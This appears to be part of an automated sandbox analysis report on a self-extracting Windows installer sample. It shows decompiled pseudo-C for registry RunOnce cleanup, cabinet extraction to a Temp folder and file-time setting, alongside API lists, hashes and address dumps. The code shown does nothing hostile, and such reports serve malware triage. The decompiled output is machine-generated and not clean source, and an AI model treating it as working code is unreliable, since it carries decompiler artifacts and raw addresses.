                                                                                                                                                                                                                                              • API String ID: 2833751637-305352358
                                                                                                                                                                                                                                              • Opcode ID: 10506cce489a23441b4b7ea7054e64bf57949d31aedfd6dec743dbff9dfef538
                                                                                                                                                                                                                                              • Instruction ID: 9c3b3f325bb764904404f0b21d8be17da299c78c827e847add5fbf2c8ac468b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10506cce489a23441b4b7ea7054e64bf57949d31aedfd6dec743dbff9dfef538
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F721F033629A04DBDB64AB24ED09B6E37B8FB80751F058569E88E561B0CFF05CC4EB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00971FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0x978530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x00971fee
                                                                                                                                                                                                                                              0x00972005
                                                                                                                                                                                                                                              0x0097200d
                                                                                                                                                                                                                                              0x00972017
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972020
                                                                                                                                                                                                                                              0x0097200d
                                                                                                                                                                                                                                              0x00972029

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0097538C,?,?,0097538C), ref: 00972005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(0097538C,wextract_cleanup0,?,?,0097538C), ref: 00972017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(0097538C,?,?,0097538C), ref: 00972020
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 849931509-702805525
                                                                                                                                                                                                                                              • Opcode ID: 543e9ecce879fe79c8fa007bfd117464296727596d94dc7beb204726868d93fb
                                                                                                                                                                                                                                              • Instruction ID: 0b22607c3e02a165bccb343c33b3ae763ad5b9fd2b162732c0a0ab86228bc8c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 543e9ecce879fe79c8fa007bfd117464296727596d94dc7beb204726868d93fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0E04F376A4318BBDB218B90EC0EF5E7B6DF781745F100198B90CA0060EB615A94E715
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00974CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				long _t35;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				long _t44;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				long _t46;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                                                                              				char* _t63;
                                                                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                                                              				int _t75;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                              				_v8 = _t30;
                                                                                                                                                                                                                                              				_t75 = _a8;
                                                                                                                                                                                                                                              				if( *0x9791d8 == 0) {
                                                                                                                                                                                                                                              					_t32 = _a4;
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                                                                                                              						_t33 = E00974E99(_t75);
                                                                                                                                                                                                                                              						L35:
                                                                                                                                                                                                                                              						return E00976CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t35 = _t32 - 1;
                                                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                                                              					if(_t35 == 0) {
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t36 = _t35 - 1;
                                                                                                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                                                                              						_t37 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t37;
                                                                                                                                                                                                                                              						if(_t37 != 0) {
                                                                                                                                                                                                                                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t54 = 0x9791e4;
                                                                                                                                                                                                                                              						_t58 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t38 =  *_t58;
                                                                                                                                                                                                                                              							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                                                                              						} while (_t38 != 0);
                                                                                                                                                                                                                                              						_t59 = _t58 - 0x9791e5;
                                                                                                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                                                                                                              						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t39 =  *_t71;
                                                                                                                                                                                                                                              							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                              							__eflags = _t39;
                                                                                                                                                                                                                                              						} while (_t39 != 0);
                                                                                                                                                                                                                                              						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                              						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							L3:
                                                                                                                                                                                                                                              							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0x9791e4;
                                                                                                                                                                                                                                              						_t30 = E00974702( &_v268, 0x9791e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t41 = E0097476D( &_v268, __eflags);
                                                                                                                                                                                                                                              						__eflags = _t41;
                                                                                                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0x180);
                                                                                                                                                                                                                                              						_t30 = E00974980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                              						_t75 = _t30;
                                                                                                                                                                                                                                              						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                              						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E009747E0( &_v268);
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x9793f4 =  *0x9793f4 + 1;
                                                                                                                                                                                                                                              						_t33 = _t75;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t44 = _t36 - 1;
                                                                                                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                                                                                                              						_t54 = 0x9791e4;
                                                                                                                                                                                                                                              						_t63 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t45 =  *_t63;
                                                                                                                                                                                                                                              							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                                                                                              						} while (_t45 != 0);
                                                                                                                                                                                                                                              						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t64 = _t63 - 0x9791e5;
                                                                                                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                                                                                                              						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t46 =  *_t74;
                                                                                                                                                                                                                                              							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                              							__eflags = _t46;
                                                                                                                                                                                                                                              						} while (_t46 != 0);
                                                                                                                                                                                                                                              						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                              						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0x9791e4;
                                                                                                                                                                                                                                              						_t30 = E00974702( &_v268, 0x9791e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                              						_t30 = E00974C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						E00974B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                              						__eflags = _t50;
                                                                                                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                                                                                                              							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                              							__eflags = _t51;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t51 = 0x80;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t33 = 1;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t30 = _t44 - 1;
                                                                                                                                                                                                                                              					__eflags = _t30;
                                                                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a4 == 3) {
                                                                                                                                                                                                                                              					_t30 = E00974B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                                                              			}































                                                                                                                                                                                                                                              0x00974cd0
                                                                                                                                                                                                                                              0x00974cdb
                                                                                                                                                                                                                                              0x00974ce0
                                                                                                                                                                                                                                              0x00974ce2
                                                                                                                                                                                                                                              0x00974cee
                                                                                                                                                                                                                                              0x00974cf2
                                                                                                                                                                                                                                              0x00974d0e
                                                                                                                                                                                                                                              0x00974d0e
                                                                                                                                                                                                                                              0x00974d11
                                                                                                                                                                                                                                              0x00974e83
                                                                                                                                                                                                                                              0x00974e88
                                                                                                                                                                                                                                              0x00974e98
                                                                                                                                                                                                                                              0x00974e98
                                                                                                                                                                                                                                              0x00974d17
                                                                                                                                                                                                                                              0x00974d17
                                                                                                                                                                                                                                              0x00974d1a
                                                                                                                                                                                                                                              0x00974d2f
                                                                                                                                                                                                                                              0x00974d2f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d2f
                                                                                                                                                                                                                                              0x00974d1c
                                                                                                                                                                                                                                              0x00974d1c
                                                                                                                                                                                                                                              0x00974d1f
                                                                                                                                                                                                                                              0x00974dcb
                                                                                                                                                                                                                                              0x00974dd0
                                                                                                                                                                                                                                              0x00974dd2
                                                                                                                                                                                                                                              0x00974ddd
                                                                                                                                                                                                                                              0x00974ddd
                                                                                                                                                                                                                                              0x00974de3
                                                                                                                                                                                                                                              0x00974de8
                                                                                                                                                                                                                                              0x00974ded
                                                                                                                                                                                                                                              0x00974ded
                                                                                                                                                                                                                                              0x00974def
                                                                                                                                                                                                                                              0x00974df0
                                                                                                                                                                                                                                              0x00974df0
                                                                                                                                                                                                                                              0x00974df4
                                                                                                                                                                                                                                              0x00974df4
                                                                                                                                                                                                                                              0x00974df6
                                                                                                                                                                                                                                              0x00974df9
                                                                                                                                                                                                                                              0x00974dfc
                                                                                                                                                                                                                                              0x00974dfc
                                                                                                                                                                                                                                              0x00974dfe
                                                                                                                                                                                                                                              0x00974dff
                                                                                                                                                                                                                                              0x00974dff
                                                                                                                                                                                                                                              0x00974e03
                                                                                                                                                                                                                                              0x00974e08
                                                                                                                                                                                                                                              0x00974e0a
                                                                                                                                                                                                                                              0x00974e0f
                                                                                                                                                                                                                                              0x00974d03
                                                                                                                                                                                                                                              0x00974d03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d03
                                                                                                                                                                                                                                              0x00974e18
                                                                                                                                                                                                                                              0x00974e20
                                                                                                                                                                                                                                              0x00974e25
                                                                                                                                                                                                                                              0x00974e27
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974e33
                                                                                                                                                                                                                                              0x00974e38
                                                                                                                                                                                                                                              0x00974e3a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974e40
                                                                                                                                                                                                                                              0x00974e51
                                                                                                                                                                                                                                              0x00974e56
                                                                                                                                                                                                                                              0x00974e5b
                                                                                                                                                                                                                                              0x00974e5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974e6a
                                                                                                                                                                                                                                              0x00974e6f
                                                                                                                                                                                                                                              0x00974e71
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974e77
                                                                                                                                                                                                                                              0x00974e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974e7d
                                                                                                                                                                                                                                              0x00974d25
                                                                                                                                                                                                                                              0x00974d25
                                                                                                                                                                                                                                              0x00974d28
                                                                                                                                                                                                                                              0x00974d36
                                                                                                                                                                                                                                              0x00974d3b
                                                                                                                                                                                                                                              0x00974d40
                                                                                                                                                                                                                                              0x00974d40
                                                                                                                                                                                                                                              0x00974d42
                                                                                                                                                                                                                                              0x00974d43
                                                                                                                                                                                                                                              0x00974d43
                                                                                                                                                                                                                                              0x00974d47
                                                                                                                                                                                                                                              0x00974d4a
                                                                                                                                                                                                                                              0x00974d4a
                                                                                                                                                                                                                                              0x00974d4c
                                                                                                                                                                                                                                              0x00974d4f
                                                                                                                                                                                                                                              0x00974d4f
                                                                                                                                                                                                                                              0x00974d51
                                                                                                                                                                                                                                              0x00974d52
                                                                                                                                                                                                                                              0x00974d52
                                                                                                                                                                                                                                              0x00974d56
                                                                                                                                                                                                                                              0x00974d5b
                                                                                                                                                                                                                                              0x00974d5d
                                                                                                                                                                                                                                              0x00974d62
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d67
                                                                                                                                                                                                                                              0x00974d6f
                                                                                                                                                                                                                                              0x00974d74
                                                                                                                                                                                                                                              0x00974d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d7c
                                                                                                                                                                                                                                              0x00974d84
                                                                                                                                                                                                                                              0x00974d89
                                                                                                                                                                                                                                              0x00974d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d94
                                                                                                                                                                                                                                              0x00974d99
                                                                                                                                                                                                                                              0x00974d9e
                                                                                                                                                                                                                                              0x00974da1
                                                                                                                                                                                                                                              0x00974daa
                                                                                                                                                                                                                                              0x00974daa
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974db5
                                                                                                                                                                                                                                              0x00974dbb
                                                                                                                                                                                                                                              0x00974dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974dc3
                                                                                                                                                                                                                                              0x00974dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974dc5
                                                                                                                                                                                                                                              0x00974dbd
                                                                                                                                                                                                                                              0x00974d2a
                                                                                                                                                                                                                                              0x00974d2a
                                                                                                                                                                                                                                              0x00974d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d2d
                                                                                                                                                                                                                                              0x00974cf8
                                                                                                                                                                                                                                              0x00974cfd
                                                                                                                                                                                                                                              0x00974d02
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00974DB5
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00974DDD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFileItemText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 3625706803-305352358
                                                                                                                                                                                                                                              • Opcode ID: ddde63e4c064993b921a285d8d9a6bb87778fae4ea5d62707d6b2241973dfc54
                                                                                                                                                                                                                                              • Instruction ID: 28e56e828a7134275f43cc83cd03f50af25582d8f7a361f15805594af94813c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddde63e4c064993b921a285d8d9a6bb87778fae4ea5d62707d6b2241973dfc54
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0841E2372041019BCB359E28D9546F973A9EB85710F04C668E8CE972D7DB71EE86C750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00974C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                                                                                                              				struct _FILETIME _v20;
                                                                                                                                                                                                                                              				FILETIME* _t14;
                                                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t21 + 0x978d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t14 =  &_v12;
                                                                                                                                                                                                                                              					_t15 = SetFileTime( *(_t21 + 0x978d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00974c40
                                                                                                                                                                                                                                              0x00974c4a
                                                                                                                                                                                                                                              0x00974c8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974c70
                                                                                                                                                                                                                                              0x00974c70
                                                                                                                                                                                                                                              0x00974c7e
                                                                                                                                                                                                                                              0x00974c86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974c8a

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32 ref: 00974C54
                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00974C66
                                                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00974C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2071732420-0
                                                                                                                                                                                                                                              • Opcode ID: 49f004576835a5bd4f4d764115516323fe1d4e1b9f9b1b68354f9b62dc77f0f9
                                                                                                                                                                                                                                              • Instruction ID: 81eec9f2daff137f6240977c1682e81757026e8a1fe4b24367bd3971bcec7ffb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49f004576835a5bd4f4d764115516323fe1d4e1b9f9b1b68354f9b62dc77f0f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0907361520CAF9B25DFB4CC48DFB77ACEB44340B48892AA86DC1051EB30D954D7A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E0097487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                                                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                              				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                              					asm("sbb esi, esi");
                                                                                                                                                                                                                                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                              						asm("sbb esi, esi");
                                                                                                                                                                                                                                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                              				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                              					return _t7;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E0097490C(_t11);
                                                                                                                                                                                                                                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x00974880
                                                                                                                                                                                                                                              0x0097488c
                                                                                                                                                                                                                                              0x00974894
                                                                                                                                                                                                                                              0x009748a0
                                                                                                                                                                                                                                              0x009748c9
                                                                                                                                                                                                                                              0x009748ce
                                                                                                                                                                                                                                              0x009748a2
                                                                                                                                                                                                                                              0x009748a8
                                                                                                                                                                                                                                              0x009748b7
                                                                                                                                                                                                                                              0x009748bc
                                                                                                                                                                                                                                              0x009748aa
                                                                                                                                                                                                                                              0x009748ac
                                                                                                                                                                                                                                              0x009748ac
                                                                                                                                                                                                                                              0x009748a8
                                                                                                                                                                                                                                              0x009748de
                                                                                                                                                                                                                                              0x009748e7
                                                                                                                                                                                                                                              0x0097490b
                                                                                                                                                                                                                                              0x009748ee
                                                                                                                                                                                                                                              0x009748f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974902

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00974A23,?,00974F67,*MEMCAB,00008000,00000180), ref: 009748DE
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00974F67,*MEMCAB,00008000,00000180), ref: 00974902
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
